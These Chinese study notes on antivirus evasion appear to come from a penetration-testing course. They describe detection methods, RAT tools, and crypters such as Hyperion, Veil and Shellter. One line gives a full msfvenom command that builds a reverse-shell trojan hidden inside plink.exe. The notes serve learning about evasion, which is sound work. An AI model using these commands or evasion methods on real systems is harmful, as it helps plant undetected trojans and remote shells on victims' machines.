免杀

10.免杀
1.杀毒软件 -> 防病毒软件，现在病毒注入到系统底层程序或服务中，先于杀毒软件开启，此时杀毒软件很难查杀；
2.检测原理：1.基于二进制文件中特征签名的黑名单检查；2.基于行为的分析方法（启发式）；
10.1.免杀技术
10.1.1.修改二进制文件中的特征字符，替代、擦除、修改；黑客、安全研究员研究防病毒软件是如何运行查杀的；
10.1.2.加密技术（黑客）：1.通过加密使得特征字符不可读；2.运行时分片分段的解密执行；
10.1.3.当前现状
10.1.3.1.1.恶意软件制造者：
常用RAT软件：灰鸽子、波尔、黑暗彗星、潘多拉、NanoCore
这个网址可以查询软件是不是恶意软件（但是这个软件会把文件提供给一些防病毒厂商）：https://www.virustotal.com/gui/home/upload
10.1.3.1.2.AV厂商：
10.1.3.1.3.NanoCore：RAT软件，可以说成是木马；可以找全配置版；操作：
1.在服务端安装软件，生成木马a.exe；
2.将木马a.exe商场到客户端上运行；
3.服务端显示客户端被控机器
10.1.3.1.4.msfvenom：可以生成远程控制程序和对程序进行加密，但因为msf框架太出名，导致很多防病毒厂家对生成的木马都能被检测出来，但msf是一个框架，会不断更新，会有新技术对杀软进行免杀；
1.生成反弹shell
2.加密编码反弹shell，通过三次、三个模块加密，总共加密22次；
【linux中可以用strings xx.exe查看到一些明文信息，里面可能有dll文件、keep live等字眼，还有参数，有助于渗透测试人员判断它的主要功能、行为特征】
3.利用模板隐藏shell，将shell绑定到正常的软件中
3.1 msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe；【这个就是注入到plink.exe文件中】不过利用的是windows-binaries里面的软件；可以尝试上传一些其它软件上去测试；
4.
10.1.3.1.5.hyperion：这是一款windows的软件加密软件，在kali中解压，然后用生成exe文件【这个文件因为需要一些动态链接库，所以要提前把库增加命令放在语句中】，因为这个是exe程序，所以要linux运行，还要安装wine，再最后利用命令生成新的加密的执行程序：例如：wine h.exe a.exe b.exe 【a.exe是msfvenom生成，b.exe是h.exe加密后的文件】
10.1.3.1.6.自己编写的后门：自己编写的后门，会提高免杀率；主要是没有人用，没人知道它的特征码；
10.1.4. Veil-evasion：
10.1.4.1.1.安装：apt-get install veil-evasion
10.1.4.1.2.这个主要是对msf playload的一个混淆和加密工作原理，从而达到免杀的效果，在实验中，因为wine中python的加密程序报故障安装不上去，一直尝试了很久，最后放弃了，换其它方法，大概原理就是这样；
10.1.5.Veil-catapult：这个是veil-framework的一部分，关键动作是投递的工作，主要是利用smbexec这个功能来传递playload到客户端内存中运行，达到免杀效果。
10.1.6.暴力破解模式：使用evade工具对可执行文件进行切片，每个切片（.exe）在拿到杀毒软件碰撞，知道特征字符，然后改掉，利用ghex或hexeditor进行修改，最后生成免杀的exe文件，这种很耗时间，免杀只能针对单一杀软，对别的杀软又要进行碰撞；
10.1.7.shellter，这个利用自动模式很简单，主要功能是对正常的软件注入msf playload，最后将软件放到客户端运行，这个在win10底下会被WDF查到，需要利用高级模式尝试，要花时间研究高级模式用法；
10.1.8.backdoor-facroty：经过kali安装，测试的时候一直显示文件不是PE文件，导致无法试验，也不知道问题出在那里，根据网上的办法解决，还是没么能修复，暂时放弃；